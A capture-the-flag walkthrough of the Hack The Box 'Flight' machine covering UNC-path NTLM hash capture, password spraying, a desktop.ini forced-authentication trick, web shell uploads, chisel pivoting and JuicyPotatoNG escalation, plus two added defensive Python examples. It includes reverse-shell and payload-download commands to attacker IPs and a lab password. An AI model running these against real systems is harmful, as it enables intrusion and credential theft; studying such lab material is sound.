Hack the box walkthrough | flight | ctf walkthrough | capture the flag

Hack the Box (HTB) academy machines walkthrough – flight

Hack the Box (HTB) academy machines walkthrough – flight : Flight from HackTheBox involved forced NTLM authentication to capture svc_apache's hash. Password spraying the enumerated usernames with that password led to S.Moon, who had write access to the Shared share, allowing us to upload a desktop.ini and perform forced authentication again to obtain c.bum's hash. That user had access to the web directory over SMB, so we uploaded a PHP file and got command execution as svc_apache. Enumerating local ports showed port 8000 serving the directory C:\inetpub\development; uploading an aspx file there returned command execution in the context of the IIS app pool, a service account with SeImpersonatePrivilege enabled, which can be abused through JuicyPotato to get a SYSTEM shell.


NMAP

$ nmap -p- --min-rate 1000 10.10.11.187
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-13 01:46 EST
Nmap scan report for school.flight.htb (10.10.11.187)
Host is up (0.30s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49697/tcp open  unknown
49709/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 197.92 seconds

Checking the Subdomains and Subfolders:

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://flight.htb/" -H "Host: FUZZ.flight.htb" --hl 154
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://flight.htb/
Total requests: 19966

=====================================================================
ID           Response   Lines    Word       Chars       Payload              
=====================================================================

000000624:   200        90 L     412 W      3996 Ch     "school" 

After finding the subdomain school, we continue enumerating the URL.

dirsearch -u http://school.flight.htb

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kayiz/Desktop/HTB/Flights/reports/http_school.flight.htb/_22-12-13_01-56-16.txt

Target: http://school.flight.htb/

But I noticed this in the results:

This URL looked like it might be vulnerable to LFI, so we checked it with ../../../../etc/passwd and got the result.

So we check the source code to see exactly how the filter works:

<?php

ini_set('display_errors', 0);
error_reporting(E_ERROR | E_WARNING | E_PARSE);

if (isset($_GET['view'])) {
    $file = $_GET['view'];
    // Blocklist: rejects traversal, php://filter wrappers, backslashes,
    // .htaccess and .shtml. Nothing here rejects a //host/share UNC path.
    if ((strpos(urldecode($_GET['view']), '..') !== false) ||
        (strpos(urldecode(strtolower($_GET['view'])), 'filter') !== false) ||
        (strpos(urldecode($_GET['view']), '\\') !== false) ||
        (strpos(urldecode($_GET['view']), 'htaccess') !== false) ||
        (strpos(urldecode($_GET['view']), '.shtml') !== false)
    ) {
        echo "<h1>Suspicious Activity Blocked!";
        echo "<h3>Incident will be reported</h3>\r\n";
    } else {
        echo file_get_contents($_GET['view']);
    }
} else {
    echo file_get_contents("C:\\xampp\\htdocs\\school.flight.htb\\home.html");
}

?>

It would be hard to bypass this filter to exploit the LFI: the checks on .., filter, backslashes, htaccess and .shtml block the usual payloads. But nothing in it rejects a Windows network share path written with forward slashes, //<ip>/<share>, so we can make the service fetch a remote source with file_get_contents() and capture the NTLMv2 hash of the account the web server runs as.
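To make the gap concrete, here is an added example (not code from the box or from this page) that re-implements the blocklist in Python beside a hardened resolver that only serves bare file names from a fixed web root; the root path /srv/www/school is an assumption for the demo.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Transcription of the page's PHP blocklist: the request is refused when any
# of these substrings occurs in the URL-decoded view parameter.
BLOCKED_TOKENS = ("..", "filter", "\\", "htaccess", ".shtml")


def blocklist_allows(view: str) -> bool:
    """True if the page's filter would let `view` reach file_get_contents().

    Mirrors the PHP: one extra urldecode() pass, and 'filter' is matched
    case-insensitively to stop php://filter stream wrappers.
    """
    decoded = unquote(view)
    for token in BLOCKED_TOKENS:
        haystack = decoded.lower() if token == "filter" else decoded
        if token in haystack:
            return False
    return True


def resolve_safely(web_root: str, view: str) -> Optional[str]:
    """Hardened replacement: allowlist the shape of the input, then verify.

    Assumption: the site only ever serves bare file names from web_root.
    Anything with a path separator, a scheme/drive colon or a leading dot is
    rejected outright, and the resolved path must stay under web_root, so a
    //host/share UNC reference never reaches the file API at all.
    """
    if not view or view.startswith(".") or any(c in view for c in "/\\:"):
        return None
    root = os.path.realpath(web_root)
    candidate = os.path.realpath(os.path.join(root, view))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for v in ("home.html", "../../../../etc/passwd", "//10.10.16.13/test"):
        allowed = blocklist_allows(v)
        served = resolve_safely("/srv/www/school", v)
        print(f"{v!r}: blocklist allows={allowed} hardened serves={served}")
```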

#Website: 
http://school.flight.htb/index.php?view=//ip-attack/test
#Attacker's machine:
responder -I tun0 -wPv
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie ([email protected])
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [ON]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.13]
    Responder IPv6             [dead:beef:4::100b]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-UJ4VMU7XFG1]
    Responder Domain Name      [R924.LOCAL]
    Responder DCE-RPC Port     [47241]

[+] Listening for events...                                                           

[SMB] NTLMv2-SSP Client   : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash     : svc_apache::flight:90b54e5073440f[...]

Crack this hash with hashcat and get the result:

hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt --show
SVC_APACHE::flight:8c0eafbdd12e31fd:e3a4c51868aef317982aabb15ce83935:[...]:S*******13

PORT 139/445 (SMB)

Checking null authentication on SMB shows that we can't access any share anonymously.

With svc_apache's credentials, we list the shares on the SMB service:

smbclient -L //flight.htb/ -U svc_apache
Password for [WORKGROUP\svc_apache]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shared          Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
        Web             Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to flight.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

AD Enum:

Enumerate domain users over SMB with the credentials obtained above:

crackmapexec smb flight.htb -u svc_apache -p 'S*********3' --users
SMB    flight.htb      445    G0     flight.htb\O.Possum          badpwdcount: 0 desc: Helpdesk
SMB    flight.htb      445    G0     flight.htb\svc_apache        badpwdcount: 0 desc: Service Apache web
SMB    flight.htb      445    G0     flight.htb\V.Stevens         badpwdcount: 0 desc: Secretary
SMB    flight.htb      445    G0     flight.htb\D.Truff           badpwdcount: 0 desc: Project Manager
SMB    flight.htb      445    G0     flight.htb\I.Francis         badpwdcount: 0 desc: Nobody knows why he's here
SMB    flight.htb      445    G0     flight.htb\W.Walker          badpwdcount: 0 desc: Payroll officer
SMB    flight.htb      445    G0     flight.htb\C.Bum             badpwdcount: 1 desc: Senior Web Developer
SMB    flight.htb      445    G0     flight.htb\M.Gold            badpwdcount: 0 desc: Sysadmin
SMB    flight.htb      445    G0     flight.htb\L.Kein            badpwdcount: 0 desc: Penetration tester
SMB    flight.htb      445    G0     flight.htb\G.Lors            badpwdcount: 0 desc: Sales manager
SMB    flight.htb      445    G0     flight.htb\R.Cold            badpwdcount: 0 desc: HR Assistant
SMB    flight.htb      445    G0     flight.htb\S.Moon            badpwdcount: 0 desc: Junio

Spraying the same password across the enumerated users shows that S.Moon uses the same password as svc_apache:

crackmapexec smb flight.htb -u users.txt -p 'S*********3' --continue-on-success
SMB    flight.htb      445    G0     [-] flight.htb\O.Possum:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [+] flight.htb\svc_apache:S*********3 
SMB    flight.htb      445    G0     [-] flight.htb\V.Stevens:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [-] flight.htb\D.Truff:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [-] flight.htb\I.Francis:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [-] flight.htb\W.Walker:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [-] flight.htb\C.Bum:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [-] flight.htb\M.Gold:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [-] flight.htb\L.Kein:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [-] flight.htb\G.Lors:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [-] flight.htb\R.Cold:S*********3 STATUS_LOGON_FAILURE 
SMB    flight.htb      445    G0     [+] flight.htb\S.Moon:S*********3

User: C.bum

Using impacket-psexec with S.moon's credentials, we can find out which share is writable: Shared. But there seems to be custom code that prevents many file types from being written to it:

impacket-psexec flight.htb/s.moon@flight.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[*] Requesting shares on g0.flight.htb.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[*] Found writable share Shared
[*] Uploading file uCHgwuyI.exe
[-] Error uploading file uCHgwuyI.exe, aborting.....
[-] Error performing the installation, cleaning up: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

To force the server to authenticate to us, we create a desktop.ini whose icon resource points at our machine:

[.ShellClassInfo]
IconResource=\\<ip>\test

After creating the desktop.ini file, we put it in the Shared folder over SMB:

smbclient //flight.htb/shared -U S.moon
Password for [WORKGROUP\S.moon]:
Try "help" to get a list of possible commands.
smb: \> put desktop.ini

On the attacker's machine, Responder receives the forced authentication from c.bum:
responder -I tun0 -wPv
[SMB] NTLMv2-SSP Client   : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash     : c.bum::flight.htb:c69dd0be9d4ce77f[...]

Then we crack c.bum's hash with hashcat:

hashcat -a 0 -m 5600 hash_c.bum /usr/share/wordlists/rockyou.txt --show
C.BUM::flight.htb:63feab9f7229564f:2bc7d47b69023462e28e2df7dccce6e6:[...]:T*************4

With this credential, we can access the Web share over SMB:

smbclient //flight.htb/Web -U c.bum 
Password for [WORKGROUP\c.bum]:
Try "help" to get a list of possible commands.
Then I upload p0wny-shell (https://github.com/flozz/p0wny-shell) into the flight.htb directory:

smb: \> ls
  .                                   D        0  Tue Dec 13 09:57:01 2022
  ..                                  D        0  Tue Dec 13 09:57:01 2022
  flight.htb                          D        0  Tue Dec 13 09:57:01 2022
  school.flight.htb                   D        0  Tue Dec 13 09:57:01 2022

                5056511 blocks of size 4096. 1250756 blocks available
smb: \> cd flight.htb
smb: \flight.htb\> put web_shell.php test.php
putting file web_shell.php as \flight.htb\test.php (8.4 kb/s) (average 9.0 kb/s)
smb: \flight.htb\>

Then open the web shell and use a reverse shell payload from revshells.com to get a session.

C.bum Session:

We have c.bum's credentials, so we switch to a session as c.bum with RunasCs: https://github.com/antonioCoco/RunasCs/tree/master

PS C:\Users\svc_apache\Desktop> .\test.exe c.bum Tikkycoll_431012284 powershell -r 10.10.16.13:9003
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-59b6e$\Default
[+] Async process 'powershell' with pid 2380 created and left in background.

After that we can read the user.txt file.

Privilege Escalation

With the shell as svc_apache, I check which ports are listening locally and find 8000. I forward it with chisel so the attacker's machine can reach it:

PS C:\xampp\htdocs\flight.htb> netstat -a

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             g0:0                   LISTENING
  TCP    0.0.0.0:88             g0:0                   LISTENING
  TCP    0.0.0.0:135            g0:0                   LISTENING
  TCP    0.0.0.0:389            g0:0                   LISTENING
  TCP    0.0.0.0:443            g0:0                   LISTENING
  TCP    0.0.0.0:445            g0:0                   LISTENING
  TCP    0.0.0.0:464            g0:0                   LISTENING
  TCP    0.0.0.0:593            g0:0                   LISTENING
  TCP    0.0.0.0:636            g0:0                   LISTENING
  TCP    0.0.0.0:3268           g0:0                   LISTENING
  TCP    0.0.0.0:3269           g0:0                   LISTENING
  TCP    0.0.0.0:5985           g0:0                   LISTENING
  TCP    0.0.0.0:8000           g0:0                   LISTENING

Pivoting Network with Chisel:

#Client (on the target):
.\chisel.exe client 10.10.16.13:9999 R:8000:127.0.0.1:8000

#Server (on the attacker's machine):
chisel server --reverse -p 9999

Once I can reach the site, I see it is written in ASP.NET, so I try uploading an .aspx shell to get a reverse shell from this session.

The uploaded shell may be removed quickly, so upload it somewhere else first and copy it into the development directory when needed:
PS C:\users\svc_apache\Desktop> copy cmd.aspx c:\inetpub\development\

We get a reverse shell as iis apppool\defaultapppool.

Administrator

Enum:

PS C:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

After reading https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens, I decided to use JuicyPotatoNG to escalate privileges on this machine: https://github.com/antonioCoco/JuicyPotatoNG

I upload two files into c:\users\c.bum\desktop:
>certutil.exe -urlcache -f http://10.10.16.13/nc.exe nc.exe
>certutil.exe -urlcache -f http://10.10.16.13/JuicyPotatoNG.exe test.exe

Then grant the Users group full control of both files so they can be executed from the other session:
>icacls nc.exe /grant Users:F
>icacls test.exe /grant Users:F

From the iis apppool session, run JuicyPotatoNG to get a SYSTEM shell:

c:\users\c.bum\desktop\test.exe -t * -p "c:\users\c.bum\desktop\nc.exe" -a "10.10.16.13 9005 -e cmd.exe"

Result:


2nd Method

PORT 80 (HTTP)


The site didn't have anything there, as it was just a page with no links; gobuster didn't show anything interesting either.

So we add flight.htb to the /etc/hosts file, since the domain name is visible at the bottom of the page.

Fuzzing for subdomains using wfuzz:

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://flight.htb' -H "Host: FUZZ.flight.htb"  --hh 7069

Adding this subdomain to the hosts file and accessing the site.

Checking for Local File Inclusion: the page filters .. if it appears in the URL, but allows /.

Foothold (Svc_apache)

Running wfuzz again to fuzz for LFI payloads, we find that we can just specify a file name without using ..

Let's verify whether we have remote file inclusion; if we do, we can point it at a fake share on our machine and use Responder to capture an NTLMv2 hash.

We have a hit, so now run Responder and access a fake share with //IP/share:

responder -I tun0

http://school.flight.htb/index.php?view=//10.10.14.28/uwu

Save this hash in a file and crack it with john:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

With the valid credentials we can start enumerating the shares and usernames through crackmapexec.

Using enum4linux-ng to query usernames and filtering them into a list so that we can password spray on them:

enum4linux-ng -A flight.htb -u 'svc_apache' -p 'S@Ss!K@*t13' | grep username | awk -F : {'print $2'} > users.txt

Using either cme or kerbrute to perform a password spray, we find S.Moon has the same password:

kerbrute passwordspray -d flight.htb --dc 10.10.11.187 ./users.txt 'S@Ss!K@*t13'

cme smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success

Checking shares with s.moon, we see that we have write access on `shared`


C.bum

Uploading a .scf file to perform forced authentication didn't work: the share didn't allow that extension, not sure why.

But uploading a desktop.ini file worked:

[.ShellClassInfo]
IconResource=\\10.10.14.28\aa
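From the defender's side, both desktop.ini uploads in this writeup (the one dropped in Shared in the first method and this one) are detectable on the file server, because Explorer only parses desktop.ini and .scf files. The scanner below is an added Python example, not from the page: it walks a share's local directory and flags icon entries that point at a UNC host; the sample share it builds in a temp directory is constructed for the demo, and the UNC target reuses the page's own 10.10.14.28 value.

```python
import os
import re
import tempfile
from typing import List, Tuple

# Explorer parses these automatically when a folder is listed, which is why an
# icon entry pointing at a remote host triggers outbound SMB authentication.
WATCHED_NAMES = {"desktop.ini"}
WATCHED_EXTS = {".scf"}

# IconResource= / IconFile= whose value starts with \\host\ or //host/ .
UNC_ICON_RE = re.compile(
    r"^\s*(?:iconresource|iconfile)\s*=\s*((?:\\\\|//)[^\s\\/]+[\\/].*?)\s*$",
    re.IGNORECASE,
)


def read_text(path: str) -> str:
    """desktop.ini written by Windows is often UTF-16 with a BOM; handle both."""
    with open(path, "rb") as fh:
        raw = fh.read()
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    return raw.decode("utf-8", errors="replace")


def scan_share(root: str) -> List[Tuple[str, str]]:
    """Return (file_path, unc_target) for every watched file under root whose
    icon entry references a remote UNC path. Local icon paths are ignored."""
    hits: List[Tuple[str, str]] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            lower = name.lower()
            if lower not in WATCHED_NAMES and os.path.splitext(lower)[1] not in WATCHED_EXTS:
                continue
            path = os.path.join(dirpath, name)
            for line in read_text(path).splitlines():
                m = UNC_ICON_RE.match(line)
                if m:
                    hits.append((path, m.group(1)))
    return hits


def build_sample_share() -> str:
    """Constructed sample share: a benign UTF-16 desktop.ini with a local icon,
    a benign .scf with a local icon, and the page's forced-auth desktop.ini."""
    root = tempfile.mkdtemp(prefix="shared_")
    os.makedirs(os.path.join(root, "Reports"))
    with open(os.path.join(root, "Reports", "desktop.ini"), "wb") as fh:
        fh.write("[.ShellClassInfo]\r\nIconResource=C:\\Windows\\System32\\shell32.dll,3\r\n".encode("utf-16"))
    with open(os.path.join(root, "Printers.scf"), "w") as fh:
        fh.write("[Shell]\r\nIconFile=C:\\Windows\\System32\\imageres.dll\r\n")
    os.makedirs(os.path.join(root, "Uploads"))
    with open(os.path.join(root, "Uploads", "desktop.ini"), "w") as fh:
        fh.write("[.ShellClassInfo]\r\nIconResource=\\\\10.10.14.28\\aa\r\n")
    return root


if __name__ == "__main__":
    for path, target in scan_share(build_sample_share()):
        print(f"ALERT {path}: icon resolves to remote host {target}")
```

Run it against the exported path of a share (or schedule it) to catch planted icon files before a user browses the folder.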

Cracking this hash again with john.

Foothold

This user has write access on the Web share, which means we can upload a PHP file that will be served on school.flight.htb.

Uploading a PHP file calling phpinfo():

<?php phpinfo(); ?>

Having the ability to execute commands on the system, we can get a reverse shell by uploading nc.exe and executing it:

http://school.flight.htb/uwu.php?cmd=curl+10.10.14.28:2222/nc64.exe -o C:\Windows\Temp\nc64.exe

http://school.flight.htb/uwu.php?cmd=C:\Windows\Temp\nc64.exe 10.10.14.28 3333 -e powershell.exe

Since we already have credentials for c.bum, we can execute commands as that user using RunasCs.exe:

.\RunasCs.exe c.bum Tikkycoll_431012284 whoami

Running netstat, we'll see that port 8000 is open locally.

Port forwarding port 8000 using chisel. On the attacker's machine:

chisel server --reverse -p 8001

And running the client on the target machine

.\chisel.exe client 10.10.14.28:8001 R:8000:127.0.0.1:8000

Accessing the port on our browser shows that access is denied


But the error page shows the path from which the directory is hosted:

C:\inetpub\Development


In this folder, there are a few HTML files.

Running icacls on the Development folder shows that c.bum has write access.

Using RunasCs we can run a command as c.bum and transfer an aspx shell into that directory:

.\RunasCs.exe c.bum Tikkycoll_431012284 'curl 10.10.14.28:2222/aspx_shell.aspx -o C:\inetpub\Development\shell.aspx'

I tried executing nc.exe to get a reverse shell, but it wasn't working for some reason, so instead I generated an msfvenom payload.

Transfer it and execute it.

On checking the privileges of iis apppool, SeImpersonatePrivilege was enabled.

To abuse this, we can use JuicyPotatoNG to get a SYSTEM shell:

.\potatoe.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Windows\Temp\nc.exe 10.10.14.28 6666 -e cmd.exe"